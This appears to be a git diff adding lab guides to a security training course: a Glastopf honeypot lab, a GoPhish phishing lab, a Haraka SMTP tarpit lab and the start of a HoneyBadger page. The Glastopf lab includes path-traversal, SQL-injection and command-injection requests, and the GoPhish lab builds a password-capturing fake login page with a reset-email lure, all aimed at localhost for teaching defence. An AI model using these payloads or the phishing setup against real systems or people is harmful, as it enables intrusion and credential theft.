similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/Local_Audit_Audit_Object.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/Local_Audit_Audit_Object.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/NewFolder.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/NewFolder.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/NewFolder.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/NewFolder.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/ObjectAccessSuccessFailure.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/ObjectAccessSuccessFailure.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/ObjectAccessSuccessFailure.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/ObjectAccessSuccessFailure.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/OpenEventViewer.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/OpenEventViewer.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/OpenEventViewer.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/OpenEventViewer.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SecretFile.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SecretFile.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SecretFile.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SecretFile.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SecretLog4656.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SecretLog4656.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SecretLog4656.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SecretLog4656.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SecretProp.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SecretProp.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SecretProp.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SecretProp.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/Security_Audit_Tab.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/Security_Audit_Tab.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/Security_Audit_Tab.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/Security_Audit_Tab.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SelectPrincipal.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SelectPrincipal.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SelectPrincipal.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SelectPrincipal.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SelectUserOrGroup.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SelectUserOrGroup.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/SelectUserOrGroup.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/SelectUserOrGroup.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/Something.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/Something.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/Something.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/Something.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachement/WindowsSecurityLogs.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/WindowsSecurityLogs.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachement/WindowsSecurityLogs.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachement/WindowsSecurityLogs.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/AddPrincipal.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/AddPrincipal.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/AddPrincipal.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/AddPrincipal.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/AllFullControl.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/AllFullControl.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/AllFullControl.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/AllFullControl.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/LocalSecurityPolicyOpen.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/LocalSecurityPolicyOpen.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/LocalSecurityPolicyOpen.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/LocalSecurityPolicyOpen.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/Local_Audit_Audit_Object.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/Local_Audit_Audit_Object.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/Local_Audit_Audit_Object.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/Local_Audit_Audit_Object.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/NewFolder.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/NewFolder.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/NewFolder.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/NewFolder.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/ObjectAccessSuccessFailure.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/ObjectAccessSuccessFailure.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/ObjectAccessSuccessFailure.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/ObjectAccessSuccessFailure.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/OpenEventViewer.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/OpenEventViewer.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/OpenEventViewer.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/OpenEventViewer.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SecretFile.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SecretFile.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SecretFile.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SecretFile.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SecretLog4656.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SecretLog4656.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SecretLog4656.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SecretLog4656.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SecretProp.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SecretProp.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SecretProp.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SecretProp.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/Security_Audit_Tab.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/Security_Audit_Tab.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/Security_Audit_Tab.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/Security_Audit_Tab.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SelectPrincipal.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SelectPrincipal.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SelectPrincipal.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SelectPrincipal.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SelectUserOrGroup.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SelectUserOrGroup.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/SelectUserOrGroup.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/SelectUserOrGroup.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/Something.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/Something.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/Something.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/Something.png
diff --git a/IntroClassFiles/Tools/IntroClass/FileAudit/attachment/WindowsSecurityLogs.png b/IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/WindowsSecurityLogs.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/FileAudit/attachment/WindowsSecurityLogs.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/FileAudit/attachment/WindowsSecurityLogs.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Glastopf.md b/IntroClassFiles/Tools/IntroClass/ADHD/Glastopf.md
new file mode 100644
index 00000000..65d9ddfc
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Glastopf.md
@@ -0,0 +1,146 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Glastopf
+
+# Ubuntu VM
+
+**Goal:** Run a working Glastopf web-application honeypot, generate simple attacks against it, and inspect captured requests and payloads
+
+---
+
+### Start Glastopf container
+
+- Go the its directory
+
+```bash
+cd ~/ADCD/glastopf
+```
+
+```bash
+sudo docker run -d --rm \
+  --name glastopf \
+  -p 8080:80 \
+  -v $(pwd)/data:/var/lib/glastopf \
+  -v $(pwd)/logs:/var/log/glastopf \
+  decepot/glastopf:latest
+```
+
+---
+
+### Verify Glastopf is running and listening
+
+- Check process or Docker container, run:
+
+```bash
+ps aux | grep glastopf
+```
+
+<img width="1199" height="67" alt="2026-03-23_14-12" src="https://github.com/user-attachments/assets/d782b8fa-8680-4de1-86da-9c5aa1afc750" />
+
+
+- Tail the main **log**
+
+```bash
+sudo docker logs -f glastopf
+```
+
+<img width="1247" height="208" alt="2026-03-23_14-14" src="https://github.com/user-attachments/assets/3c969171-b913-4890-a1c3-1048b126ca0e" />
+
+---
+
+## Generate attacks 
+
+- Open another **terminal** (attacker) and try the following. These simulate common web malicious requests.
+
+### Simple directory traversal / LFI attempts
+
+```bash
+curl -v "http://localhost:8080/index.php?page=../../etc/passwd"
+```
+
+<img width="1059" height="976" alt="2026-03-23_14-19" src="https://github.com/user-attachments/assets/1c0fa528-eaee-4b27-a3f5-1d91c0321ebf" />
+
+```bash
+curl -v "http://localhost:8080/?file=../boot.ini"
+```
+
+<img width="1904" height="944" alt="2026-03-23_14-22" src="https://github.com/user-attachments/assets/0de57c7c-9c69-4cca-a2b8-39bea7173798" />
+
+
+- That is how it looks from a **hacker**'s perspective(**fake information**)
+
+- When in reality, all that is **fake** and it is being logged on the **defender**'s side:
+
+<img width="1193" height="57" alt="2026-03-23_14-23" src="https://github.com/user-attachments/assets/81a6f433-fa7b-45b3-9239-4362269c3c42" />
+
+### SQL injection-like payloads
+
+```bash
+curl 'http://localhost:8080/index' \
+  -X POST \
+  -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:148.0) Gecko/20100101 Firefox/148.0' \
+  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
+  -H 'Accept-Language: en-US,en;q=0.9' \
+  -H 'Accept-Encoding: gzip, deflate, br, zstd' \
+  -H 'Referer: http://localhost:8080/index' \
+  -H 'Content-Type: application/x-www-form-urlencoded' \
+  -H 'Origin: http://localhost:8080' \
+  -H 'Connection: keep-alive' \
+  -H 'Upgrade-Insecure-Requests: 1' \
+  -H 'Sec-Fetch-Dest: document' \
+  -H 'Sec-Fetch-Mode: navigate' \
+  -H 'Sec-Fetch-Site: same-origin' \
+  -H 'Priority: u=0, i' \
+  --data-raw 'login=admin&password=%27+OR+%271%27%3D%271%27--&submit=Submit'
+```
+
+OR (pun intended)
+
+```bash
+curl -v "http://localhost:8080/search.php?q=1%27%20UNION%20SELECT%20NULL--"
+```
+
+- Look at the **fake information** and then back to see how it has been **logged** on the **defender**'s terminal
+
+### Remote command injection attempts
+
+```bash
+curl -v "http://localhost:8080/?cmd=whoami"
+curl -v "http://localhost:8080/?cmd=;id"
+```
+
+### Use automated scanners
+
+Install basic testing tools and run quick scans against `localhost`.
+
+```bash
+nikto -h http://localhost:8080
+```
+
+```bash
+sqlmap -u "http://localhost:8080/index.php?id=1" --batch --level=1
+```
+
+> Each of the above requests are recorded by **Glastopf** and should show up in **logs** and the event store.
+
+>[!IMPORTANT]
+>To stop **Glastopf** do:
+>
+>`sudo docker stop glastopf`
+
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/ModSecurity.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/webhoneypot/webhoneypot.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/GoPhish.md b/IntroClassFiles/Tools/IntroClass/ADHD/GoPhish.md
new file mode 100644
index 00000000..67b0deb1
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/GoPhish.md
@@ -0,0 +1,252 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Ubuntu VM
+
+# GoPhish
+
+This lab demonstrates **what GoPhish can do** from both an attacker and defender perspective
+You will **launch a phishing campaign**, and **observe captured credentials and events**
+
+---
+
+## Lab Objectives
+
+In this lab you will:
+- Launch the GoPhish web interface
+- Create a basic phishing campaign
+- Capture submitted credentials
+- Analyze campaign results
+
+
+---
+
+# Start GoPhish
+
+```
+cd ~/BnB/gophish
+```
+
+```bash
+sudo ./gophish
+```
+
+You should see output similar to:
+```
+Starting admin server at http://0.0.0.0:3333
+```
+
+<img width="1165" height="276" alt="2026-03-17_22-40" src="https://github.com/user-attachments/assets/b530c26d-c4a6-4d4d-945a-3ecfa4a14419" />
+
+
+>[!IMPORTANT]
+>Leave this terminal open
+
+---
+
+# Step 4 – Access the Admin Panel
+
+Open a browser and go to:
+
+```
+https://localhost:3333
+```
+
+<img width="563" height="536" alt="image" src="https://github.com/user-attachments/assets/949def60-dbea-431b-affd-1ad2c58d330e" />
+
+
+### Default credentials:
+- **Username:** admin
+- **Password:** (shown in terminal output)
+
+
+<img width="1189" height="177" alt="2026-03-17_22-43" src="https://github.com/user-attachments/assets/193cc5bd-35a5-4ca9-a602-a69a1064b24b" />
+
+
+Copy the password from the terminal and log in
+
+- Make your own password afterwards:
+
+<img width="574" height="684" alt="image" src="https://github.com/user-attachments/assets/fb7954db-7c5e-4933-a710-405037ab9dc8" />
+
+---
+
+# Step 5 – Create a Sending Profile
+
+1. Click **Sending Profiles** in the **left** tab
+
+<img width="329" height="55" alt="image" src="https://github.com/user-attachments/assets/2aa9f0ba-4567-444e-8862-15ce973d7003" />
+
+2. Click **New Profile**
+
+<img width="153" height="73" alt="image" src="https://github.com/user-attachments/assets/342a74e4-7ac4-4b68-a530-0a453b1cf1da" />
+
+3. Use:
+   - Name: `Local SMTP`
+   - Host: `127.0.0.1:1025`
+   - From: `IT Support <it@company.local>`
+4. Click **Save**
+
+>[!NOTE]
+>We are using port `1025` because that's the port where **MailHog** will be serving and listening
+
+---
+
+# Step 6 – Create a Landing Page (Credential Capture)
+
+1. Click **Landing Pages**
+
+<img width="331" height="68" alt="image" src="https://github.com/user-attachments/assets/03e2b2a3-db91-4be2-8bd9-f2411b6c27b2" />
+
+2. Click **New Page**
+
+<img width="127" height="62" alt="image" src="https://github.com/user-attachments/assets/c7564680-68ba-4114-9b21-0e8f386d2bda" />
+
+3. Name: `Fake Login`
+4. Check:
+   - Capture Submitted Data
+   - Capture Passwords
+
+<img width="228" height="99" alt="image" src="https://github.com/user-attachments/assets/89a40847-1009-4fe2-98c5-c613bc457f6e" />
+
+5. HTML Content:
+
+```html
+<h2>Company Login</h2>
+<form method="POST">
+  <input name="username" placeholder="Username"><br><br>
+  <input name="password" type="password" placeholder="Password"><br><br>
+  <button type="submit">Login</button>
+</form>
+```
+
+6. Click **Save Page**
+
+---
+
+# Step 7 – Create an Email Template
+
+1. Click **Email Templates**
+
+<img width="326" height="64" alt="image" src="https://github.com/user-attachments/assets/96522c2f-5d63-4dd2-bf4a-344ab2f705fd" />
+
+2. Click **New Template**
+
+<img width="160" height="64" alt="image" src="https://github.com/user-attachments/assets/5b8e4d53-bb30-4dc8-8597-79cac373fad6" />
+
+3. Name: `Password Reset`
+4. Subject: `Urgent Password Reset`
+5. Body(HTML):
+
+```html
+<p>Your password is expiring.</p>
+<p><a href="{{.URL}}">Click here to reset it</a></p>
+```
+
+6. Click **Save Template**
+
+---
+
+# Step 8 – Create a User Group
+
+1. Click **Users & Groups**
+
+<img width="333" height="72" alt="image" src="https://github.com/user-attachments/assets/d964a536-e704-4a8a-bb02-ab1e9edd1d86" />
+
+2. Click **New Group**
+
+<img width="141" height="58" alt="image" src="https://github.com/user-attachments/assets/f62ff2a3-43d5-4985-a15c-cd5075b1d053" />
+
+3. Name: `Test Users`
+4. Add user:
+   - First Name: `Test`
+   - Last Name: `User`
+   - Email: `test@company.local`
+5. Click **+Add**
+
+<img width="107" height="59" alt="image" src="https://github.com/user-attachments/assets/6cd813f4-d826-491e-86bd-d4776aeb6b7c" />
+
+6. Click **Save Changes**
+
+---
+
+# Step 9 - Run MailHog
+
+```bash
+MailHog
+```
+
+
+<img width="609" height="162" alt="2026-03-17_22-53" src="https://github.com/user-attachments/assets/825f0fe2-54cf-4f3d-878f-083d104cfbb5" />
+
+
+# Step 10 – Launch a Phishing Campaign
+
+1. Click **Campaigns**
+
+<img width="328" height="63" alt="image" src="https://github.com/user-attachments/assets/b689bf15-cc9d-4fd8-a63e-82c3a03aeab2" />
+
+2. Click **New Campaign**
+
+<img width="163" height="61" alt="image" src="https://github.com/user-attachments/assets/25f5651a-a932-4e9e-b46b-9a7e227b0e8f" />
+
+3. Name: `Demo Campaign`
+4. Select:
+   - Email Template: `Password Reset`
+   - Landing Page: `Fake Login`
+   - Sending Profile: `Local SMTP`
+   - Users Group: `Test Users`
+5. Click **Launch Campaign**
+
+---
+
+- Now go back to the **MailHog Terminal**
+
+- You should see the new mail
+
+<img width="1898" height="1005" alt="2026-03-17_23-06" src="https://github.com/user-attachments/assets/7766f585-34b3-4e3b-bb58-698dc8fbc071" />
+
+
+- What we get out of it?
+
+1. Sender and recipient accepted
+```
+MAIL FROM:<it@company.local>
+RCPT TO:<test@company.local>
+250 ok
+```
+
+2. Email content delivered
+```
+DATA
+Subject: Urgent Password Reset
+X-Mailer: gophish
+```
+
+3. Email stored by MailHog
+```
+Storing message nYyPFT2-foO9BZ2z...
+250 Ok: queued
+```
+
+4. Body of the email
+```
+<p>Your password is expiring.</p>
+<p><a href=3D"?rid=3DzKNkt2x">Click here to reset it</a></p>'
+```
+
+...and more very in depth details
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Mailoney.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/Canarytokens.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/Haraka.md b/IntroClassFiles/Tools/IntroClass/ADHD/Haraka.md
new file mode 100644
index 00000000..0bbf489d
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/Haraka.md
@@ -0,0 +1,333 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+
+# For the Ubuntu VM
+
+# Haraka 
+
+**Goal:** Build a simple Haraka SMTP that demonstrates SMTP interaction, using the `tarpit` plugin to slow and frustrate attackers
+
+---
+
+# Start
+
+- Open a **terminal**
+
+- Go to the lab directory and make sure **Haraka** is set up
+
+```bash
+cd ~/ADCD/haraka
+```
+
+```bash
+haraka -i .
+```
+
+```bash
+ls -la
+```
+
+<img width="598" height="201" alt="Screenshot From 2026-03-14 22-10-01" src="https://github.com/user-attachments/assets/9d02f1f3-e767-4ac9-ab5a-6d17c135ebb9" />
+
+
+
+- You now have a **Haraka** instance with `config/`, `plugins/`, etc.
+
+---
+
+## Configure Haraka for tarpit deception
+
+1. Set **Haraka** to listen on **port 2525**. Edit `config/smtp.ini`:
+
+```bash
+nano config/smtp.ini
+```
+
+- Add at the end:
+
+```ini
+listen=0.0.0.0:2525
+```
+
+- To exit and save the file do `Ctrl + x` and `y` and `Enter`
+
+2. Enable a tiny **HTTP endpoint** for live observation. Create `config/http.ini`:
+
+```bash
+nano config/http.ini
+```
+
+```ini
+listen=0.0.0.0:8080
+```
+
+- To exit and save the file do `Ctrl + x` and `y` and `Enter`
+
+3. Edit `config/plugins` so it contains these lines (order matters - keep `tarpit` early):
+
+```bash
+rm config/plugins
+```
+
+```bash
+nano config/plugins
+```
+
+- Paste the following:
+
+```
+tarpit
+tarpit_demo
+access
+helo.checks
+rcpt_to.in_host_list
+data.headers
+queue/smtp_forward
+save_msg
+```
+
+- To exit and save the file do `Ctrl + x` and `y` and `Enter`
+
+4.
+
+```bash
+nano plugins/tarpit_demo.js
+```
+
+- Paste:
+
+```js
+// plugins/tarpit_demo.js
+exports.hook_connect = function (next, connection) {
+    const seconds = 3; // delay per hook
+    connection.notes.tarpit = seconds;
+    connection.loginfo(this, 'tarpit_demo: setting tarpit to ' + seconds + ' seconds');
+    next();
+};
+```
+
+- To exit and save the file do `Ctrl + x` and `y` and `Enter`
+
+* `tarpit` will slow connections (deception).
+* `save_msg` (we will add next) stores message files for analysis.
+
+---
+
+## Add a simple message‑saving plugin
+
+- Create `plugins/save_msg.js` with this content. It writes received messages to `logs/msgs/`:
+
+```bash
+nano plugins/save_msg.js
+```
+
+- Paste the following:
+
+```javascript
+// plugins/save_msg.js
+const fs = require('fs');
+const path = require('path');
+
+exports.hook_data_post = function (next, connection) {
+    const txn = connection.transaction;
+    if (!txn) return next();
+
+    const outdir = path.join(__dirname, '..', 'logs', 'msgs');
+    fs.mkdirSync(outdir, { recursive: true });
+
+    const fname = path.join(
+        outdir,
+        Date.now() + '-' + Math.floor(Math.random() * 10000) + '.eml'
+    );
+
+    const from = (txn.mail_from && txn.mail_from.original) ?
+        txn.mail_from.original : '<unknown>';
+
+    const rcpts = (txn.rcpt_to || [])
+        .map(r => r.original)
+        .join(', ');
+
+    const header =
+        'From: ' + from + '\n' +
+        'To: ' + rcpts + '\n\n';
+
+    const ws = fs.createWriteStream(fname);
+    ws.write(header);
+
+    txn.message_stream.pipe(ws);
+
+    ws.on('finish', () => {
+        connection.loginfo(this, 'saved message to ' + fname);
+        next();
+    });
+
+    ws.on('error', (err) => {
+        connection.logerror(this, 'failed to save message: ' + err.message);
+        next();
+    });
+};
+```
+
+- To exit and save the file do `Ctrl + x` and `y` and `Enter`
+
+- Make the plugin executable:
+
+```bash
+chmod 644 plugins/save_msg.js
+```
+
+---
+
+## Tarpit configuration
+
+- Create `config/tarpit.ini` to customize tarpit behavior. Example (conservative delays):
+
+```bash
+nano config/tarpit.ini
+```
+
+- Paste the following:
+
+```ini
+# config/tarpit.ini
+# base delay in seconds
+base_delay=2
+# random extra delay (0..n seconds)
+rand_delay=3
+# apply to all connections
+enabled=1
+```
+
+
+- To exit and save the file do `Ctrl + x` and `y` and `Enter`
+
+- You can increase `base_delay` and `rand_delay` to make attacks slower during demonstrations
+
+---
+
+## Start Haraka and confirm it is listening
+
+```bash
+haraka -c .
+```
+
+<img width="1156" height="1008" alt="2026-03-14_22-58" src="https://github.com/user-attachments/assets/7574f4f4-0417-440d-b536-29da11c23c2d" />
+
+- Open another **Terminal**
+
+```bash
+# check listen port
+ss -ltnp | grep 2525
+```
+
+<img width="970" height="48" alt="2026-03-14_23-00" src="https://github.com/user-attachments/assets/fba65ea7-b81f-4748-97bb-cbc373b1742a" />
+
+
+---
+
+## Simulate attacker behavior and observe tarpit
+
+### a) Manual SMTP session (telnet / netcat)
+
+```bash
+nc localhost 2525
+```
+
+- Then type:
+
+```bash
+HELO attacker.example.com
+```
+
+```bash
+MAIL FROM:<evil@attacker.test>
+```
+
+```bash
+RCPT TO:<victim@localhost>
+```
+
+- Check the logs on the **Haraka** Terminal
+
+<img width="1281" height="136" alt="2026-03-14_23-04" src="https://github.com/user-attachments/assets/bf980f25-1574-411c-b92f-4707d093cecb" />
+
+- Now back at the **Attacker** Termianl
+
+```bash
+QUIT
+```
+
+- Watch the **logs** on the first **terminal**. Connections will be slower depending on `tarpit.ini` settings
+
+### b) Scripted load with `swaks`
+
+```bash
+# single message
+swaks --server localhost:2525 --from attacker@evil.test --to victim@localhost --data "Subject: swaks test
+
+hello"
+```
+
+<img width="781" height="350" alt="2026-03-14_23-07" src="https://github.com/user-attachments/assets/cd936150-f10b-4028-9810-5660de1ca436" />
+
+```bash
+# rapid loop to show tarpit effect
+for i in {1..8}; do
+  swaks --server localhost:2525 --from t$i@x.test --to victim@localhost --data "Subject: loop $i
+
+hello $i" &
+done
+```
+
+Because `tarpit` intentionally delays responses, the loop will take noticeably longer than without tarpit. Observe connection times in `haraka.out`
+
+---
+
+## Demonstrate attacker frustration (timing comparison)
+
+- Stop **haraka**, from the **haraka** terminal do `Ctrl + c`
+
+1. Let's comment out `tarpit_demo` in plugin
+
+```bash
+nano config/plugins
+```
+
+- Put a `#` in before `tarpit_demo`
+
+<img width="209" height="199" alt="0" src="https://github.com/user-attachments/assets/f322e329-dada-4a48-b3b1-819838b478c7" />
+
+- To exit and save the file do `Ctrl + x` and `y` and `Enter`
+
+- Start it again
+
+2. Run the same `swaks` loop and measure how long it takes:
+
+```bash
+time bash -c 'for i in {1..8}; do swaks --server localhost:2525 --from t$i@x.test --to victim@localhost --data "Subject: quick $i
+
+ok" & done; wait'
+```
+
+<img width="177" height="72" alt="1" src="https://github.com/user-attachments/assets/5ff4c22e-2e22-4d6d-a671-33a267f10321" />
+
+3. Re-enable tarpit (set delays back) and run the same `time` command again. The second run should take longer - this demonstrates the deceptive slowdown.
+
+<img width="180" height="74" alt="2" src="https://github.com/user-attachments/assets/d37f194c-7478-444a-985d-80259993bce2" />
+
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/dionaea.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/ModSecurity.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/HoneyBadger.md b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/HoneyBadger.md
new file mode 100644
index 00000000..2f04d624
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/HoneyBadger.md
@@ -0,0 +1,438 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+HoneyBadger
+=========================
+
+Website
+-------
+<https://github.com/adhdproject/honeybadger>
+
+Description
+-----------
+Used to identify the physical location of a web user with a combination of geolocation techniques using a browser's share location feature, the visible WiFi networks, and the IP address.
+
+Updates
+-------
+What's new in HoneyBadger?
+
+* Updated to Python 3.x
+* API keys extracted as CLI arguments
+* New fallback geolocation APIs added (IPStack, IPInfo.io)
+* New utilities for automatic wireless surveying (Windows, Linux)
+* New beacon agents (VB.NET, VBA)
+
+
+Install Location
+----------------
